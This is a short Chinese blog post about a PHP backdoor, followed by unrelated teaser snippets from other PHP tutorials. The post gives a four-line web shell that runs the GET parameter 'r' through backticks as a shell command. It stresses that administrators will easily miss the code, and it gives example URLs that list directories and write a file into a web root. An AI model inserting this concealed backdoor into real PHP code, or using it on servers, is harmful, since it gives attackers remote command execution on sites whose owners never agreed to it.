偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。
伪装性很好,很容易被管理员忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
echo `$selfNums`;
}
刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
本文实例讲述了php中chdir()函数的用法。分享给大家供大家参考。具体用法分析如下: php chdir() 函数语法:bool切换目录(字符串目录)dirDirectory改变to...
本文实例分析了PHP函数import_request_variables()用法。分享给大家供大家参考,具体如下: import_request_variables 函数可以在 regi...
一、实现原理 在PHP的函数中,global语法是比较常见的,大家一定都知道一旦在函数中global了某个外部变量后,这个变量就可以在这个函数中使用了,但是也有不少网友不知道这是一个什么...
行为的属性和方法注入原理 上面我们了解到了行为的用意在于将自身的属性和方法注入给所依附的类。 那么Yii中是如何将一个行为 yii\base\Behavior 的属性和方法, 注入到一个...
本文实例讲述了PHP实现无限极分类的两种方式。分享给大家供大家参考,具体如下:面试的时候被问到无限极分类的设计和实现,比较常见的做法是在建表的时候,增加一个PID字段用来区别自己所属的分类...